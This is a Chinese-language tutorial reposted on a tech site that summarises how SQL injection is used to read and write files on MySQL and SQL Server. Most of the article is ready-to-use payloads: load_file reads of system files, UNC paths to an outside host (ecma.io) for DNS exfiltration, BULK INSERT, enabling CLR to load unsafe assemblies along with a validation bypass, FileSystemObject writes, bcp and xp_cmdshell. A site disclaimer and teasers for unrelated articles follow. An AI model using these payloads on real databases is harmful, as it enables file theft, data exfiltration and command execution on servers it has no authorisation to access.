时间:2021-05-23
前言
SQL注入有直接sql注入也有文件读写时的注入了我们这篇文章介绍的是SQL注入中的文件读写这一块的内容,具体的一起来看看。
一、MySQL
读文件
常见的读文件,可以用16进制代替字符串
select load_file('c:/boot.ini')select load_file(0x633a2f626f6f742e696e69)select load_file('//ecma.io/1.txt') # smb协议select load_file('\\\\ecma.io\\1.txt') # 可用于DNS隧道写文件
我暂时已知l两种写文件的方式
二、 SQL Server
读文件
1. BULK INSERT
create table result(res varchar(8000));bulk insert result from 'd:/1.txt';2. CLR集成
// 开启CLR集成exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'clr enabled',1reconfigurecreate assembly sqb from 'd:\1.exe' with permission_set=unsafe上面一句可以利用create assembly函数从远程服务器加载任何.NET二进制文件到数据库中;但是他会验证是否为合法.NET程序,导致失败,下面是读取方式
select master.dbo.fn_varbintohexstr(cast(content as varbinary)) from sys.assembly_files绕过,首先加载一个有效的.NET的二进制文件,然后追加文件即可,下面是绕过方法。
create assembly sqb from 'd:\net.exe';alter assembly sqb add file from 'd:\1.txt'alter assembly sqb add file from 'd:\notnet.exe'3. Script.FileSystemObject
写文件
1. Script.FileSystemObject
declare @o int, @f int, @t int, @ret intdeclare @line varchar(8000)exec sp_oacreate 'scripting.filesystemobject',@o outexec sp_oamethod @o, 'createtextfile', @f out, 'e:\1.txt', 1exec @ret = sp_oamethod @f, 'writeline', NULL ,'This is the test string'2. BCP复制文件(测试失败,无bcp.exe)
c:\windows>system32>bcp "select name from sysobjects" query testout.txt -c -s 127.0.0.1 -U sa -p"sa"3. xp_cmdshell
exec xp_cmdshell 'echo test>d:\1.txt'三、Oracle
pass,Oracle太坑了~~~几乎都受到PL/SQL的限制,暂时不讨论
总结
以上就是关于SQL注入中文件的读写方法总结,希望本文的内容对大家的学习或者工作能带来一定的帮助,如果有疑问大家可以留言交流。
声明:本页内容来源网络,仅供用户参考;我单位不保证亦不表示资料全面及准确无误,也不保证亦不表示这些资料为最新信息,如因任何原因,本网内容或者用户因倚赖本网内容造成任何损失或损害,我单位将不会负任何法律责任。如涉及版权问题,请提交至online#300.cn邮箱联系删除。
例如:SQL注入攻击XSS攻击复制代码代码如下:任意执行代码文件包含以及CSRF.}关于SQL攻击有很多文章还有各种防注入脚本,但是都不能解决SQL注入的根本问
本文实例总结了java中关于文本文件的读写方法。分享给大家供大家参考,具体如下:写文本数据方法一:importjava.io.*;publicclassA{pu
本文实例讲述了PHP+mysql防止SQL注入的方法。分享给大家供大家参考,具体如下:SQL注入例:脚本逻辑$sql="SELECT*FROMuserWHERE
本文实例讲述了Java编程中文件读写的方法。分享给大家供大家参考,具体如下:Java中文件读写操作的作用是什么?回答这个问题时应该先想到的是Java只是一门语言
SQL注入攻击的总体思路:发现SQL注入位置;判断服务器类型和后台数据库类型;确定可执行情况对于有些攻击者而言,一般会采取sql注入法。下面我也谈一下自己关于s